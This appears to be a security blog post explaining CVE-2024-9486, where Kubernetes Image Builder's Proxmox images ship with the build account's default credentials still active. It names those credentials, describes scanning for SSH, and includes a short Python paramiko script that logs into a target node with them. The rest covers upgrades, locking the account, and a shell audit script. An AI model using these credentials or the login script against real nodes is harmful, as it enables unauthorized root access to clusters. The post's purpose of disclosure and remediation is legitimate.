CVE-2024-9486 - Default Credentials Risk in Kubernetes Image Builder’s Proxmox Provider — Exploit Details & Prevention
CVE-2024-9486 is a critical security issue (CVSS 9.8) in the Kubernetes Image Builder tool, versions v0.1.37 and earlier. The bug is in the Proxmox provider: the default credentials used to log in to the VM while the image is being built are never disabled, so they remain valid in the finished image. Every Kubernetes node booted from such an image is therefore reachable with a known username and password, and because those credentials can be used to gain root, an attacker who logs in owns the node. Below, we break down what happened, show how the flaw is exploited, and explain how to fix it quickly.
What is Kubernetes Image Builder & The Proxmox Provider?
Kubernetes Image Builder is an open-source project designed to automate the process of creating custom virtual machine images for Kubernetes nodes, compatible with cloud and on-prem providers. One such provider is Proxmox VE, a popular open-source virtualization platform.
What is CVE-2024-9486?
CVE-2024-9486 refers to a vulnerability in Image Builder’s Proxmox provider:
When it builds virtual machine (VM) images, it fails to *disable* the default build-time credentials (the builder account) before the image is finalized.
- Anyone who knows the defaults can log in to a node deployed from such an image, over SSH or at the console.
- From that account the attacker can gain root, which means full control of the node and a foothold into the cluster it has joined.
Who is affected?
Any Kubernetes cluster operator who uses images made with Kubernetes Image Builder (v0.1.37 or earlier) and its Proxmox provider. VM images made outside of this process aren’t impacted, and images built with the other providers are not affected by this CVE; the related, lower-severity CVE-2024-9594 covers the Nutanix, OVA, QEMU and raw providers, where the default credentials are enabled only while the build is running, so an attacker would have to reach the VM during the build itself.
Official disclosure:
- GitHub Advisory: GHSA-345h-7xwj-f2vc
- Patch commit: Remove default credentials on Proxmox provider
- CVE Record: CVE-2024-9486 on mitre.org
Exploit Details: How Attackers Get In
If an attacker can reach a node built from a vulnerable image over the network (SSH) or through the Proxmox console, the build-time credentials let them log in without any exploit at all.
Example default credentials
Username: builder
Password: builder
> (Note: builder is the account the Proxmox provider uses to provision the image, and the one the upstream mitigation tells operators to lock with usermod -L builder. If your build configuration overrides the SSH username or password, the leftover credentials are whatever you set there.)
Locate exposed Kubernetes nodes:
Attackers look for nodes with SSH reachable from networks they control, for example by scanning for port 22 and trying the known credentials; nothing about the target needs to be Kubernetes-specific for it to be found this way.
Access Kubernetes node or cluster:
Once logged in, the attacker escalates to root, and at that point they can install malware, exfiltrate data, or compromise the containers and kubelet credentials on the node.
Example Python exploit (requires the paramiko library; replace TARGET_NODE_IP with the node address)
import paramiko
# Node built from a vulnerable Image Builder release; the credentials are the
# build-time defaults that were never disabled.
ip = 'TARGET_NODE_IP'
user = 'builder'
password = 'builder'
ssh = paramiko.SSHClient()
# Accept the unknown host key: the attacker has never seen this node before.
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, username=user, password=password)
# A successful 'id' proves the login works; from here the attacker goes for root.
stdin, stdout, stderr = ssh.exec_command('id')
print(stdout.read().decode())
ssh.close()
Prevention: How to Fix It
1. Upgrade Image Builder
Immediate fix:
Upgrade to Image Builder v0.1.38 or later. The fixed release uses a randomly generated password for the build account while the image is being built and disables the account before the build finishes, so the defaults never ship in the image.
- Release notes
2. Check Existing Images
Rebuild all VM images for Kubernetes nodes using the updated tool, then roll the new images out; upgrading Image Builder does nothing for images and nodes that already exist.
Until you can replace a node, lock the build account on it, as the upstream mitigation recommends:
# On each VM node:
sudo usermod -L builder
After deployment, verify no VMs contain an active default account. passwd -S prints L for a locked account and P for one that still has a usable password:
sudo getent passwd builder
sudo passwd -S builder
sudo getent shadow builder
Also check for successful password logins to the account from before you locked it, since those mean the node may already be compromised:
sudo journalctl _COMM=sshd | grep 'Accepted password for builder'
Remove unnecessary accounts, rotate any credentials that were stored on an exposed node, and, if your build configuration overrides the default username, substitute that name in the commands above.
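As an added example (not code from the Image Builder project or from this post's original author), here is a small POSIX shell script that turns the checks in step 2 into something you can run on every node: it lists accounts whose /etc/shadow entry still has a usable password, reads sshd's effective PasswordAuthentication setting, and wraps the upstream usermod -L mitigation. The account name builder, the sample shadow and sshd_config lines, and the function names are assumptions of the example, constructed so it can be exercised offline.

```shell
#!/bin/sh
# Added example, not code from the Image Builder project: audit a node for the
# leftover build account from CVE-2024-9486 and lock it. The account name
# "builder" is the one the upstream mitigation locks (usermod -L builder).
# The /etc/shadow and sshd_config contents below are constructed samples so the
# script runs offline; on a real node point the functions at the live files.

# Print every account whose shadow password field is usable for login: the
# field is empty (no password at all) or is a hash that does not start with
# "!" or "*", the markers passwd -l / usermod -L write to lock an account.
shadow_unlocked_accounts() {
    awk -F: '$2 !~ /^[!*]/ { print $1 }' "$1"
}

# Print "yes" or "no" for whether sshd accepts password logins under the
# given config. The last uncommented PasswordAuthentication directive wins;
# OpenSSH's default when none is present is "yes". Match blocks are ignored.
sshd_password_auth() {
    awk 'tolower($1) == "passwordauthentication" { v = tolower($2) }
         END { print (v == "" ? "yes" : v) }' "$1"
}

# Return 0 if ACCOUNT is absent or locked in SHADOW_FILE, 1 if it still has a
# usable password. The sshd posture is reported alongside because the leftover
# password is only reachable over the network when password auth is on; a
# Proxmox console login bypasses sshd entirely, so locking the account is the
# only complete fix.
audit_build_account() {
    shadow_file="$1"; sshd_conf="$2"; account="${3:-builder}"
    pwauth=$(sshd_password_auth "$sshd_conf")
    if shadow_unlocked_accounts "$shadow_file" | grep -qx "$account"; then
        echo "FAIL: '$account' has a usable password (sshd PasswordAuthentication=$pwauth)"
        return 1
    fi
    echo "OK: '$account' absent or locked (sshd PasswordAuthentication=$pwauth)"
    return 0
}

# Remediation, run as root on an affected node: lock the account (keeps the
# home directory for forensics) and show its new status.
lock_build_account() {
    account="${1:-builder}"
    usermod -L "$account" && passwd -S "$account"
}

# Constructed sample inputs: a node from a vulnerable build (builder still has
# a hash), the same node after usermod -L (hash prefixed with "!"), and an
# sshd_config whose only active directive disables password logins.
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
cat > "$tmp/shadow.vulnerable" <<'EOF'
root:*:19600:0:99999:7:::
builder:$6$examplesalt$NOTAREALHASHxxxxxxxxxxxxxxxxxxxxxxxxxx:19600:0:99999:7:::
ubuntu:!:19600:0:99999:7:::
EOF
cat > "$tmp/shadow.fixed" <<'EOF'
root:*:19600:0:99999:7:::
builder:!$6$examplesalt$NOTAREALHASHxxxxxxxxxxxxxxxxxxxxxxxxxx:19600:0:99999:7:::
EOF
cat > "$tmp/sshd_config" <<'EOF'
# PasswordAuthentication yes   (commented out, so it does not count)
PasswordAuthentication no
EOF

audit_build_account "$tmp/shadow.vulnerable" "$tmp/sshd_config" builder || echo "-> run lock_build_account builder on this node"
audit_build_account "$tmp/shadow.fixed" "$tmp/sshd_config" builder
```

On a live node, source the script and run audit_build_account /etc/shadow /etc/ssh/sshd_config builder as root, then lock_build_account builder if it reports FAIL; if your build overrides the default username, pass that name instead. Note that a "no" from the sshd check is not a reason to skip locking: the Proxmox console still accepts the password.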
Conclusion
CVE-2024-9486 highlights the dangers of shipping VM images with insecure defaults, especially in automated infrastructure where the same image is stamped out across many nodes. Any Kubernetes environment using Proxmox images built with Image Builder v0.1.37 or earlier should treat this bug as critical.
If you’re a cluster operator, check your VM images today, rotate credentials, and update your toolchain. Attackers are actively scanning for weak defaults — don’t make it easy for them.
Resources
- Official Kubernetes Image Builder repo
- Proxmox VE home
- GitHub Security Advisory for CVE-2024-9486
- Mitre Details for CVE-2024-9486
- How to secure your Kubernetes cluster
If you found this post helpful, share it with your team or community — securing cloud-native infrastructure is everyone’s job.
Timeline
Published on: 10/15/2024 21:15:11 UTC
Last modified on: 10/16/2024 16:38:14 UTC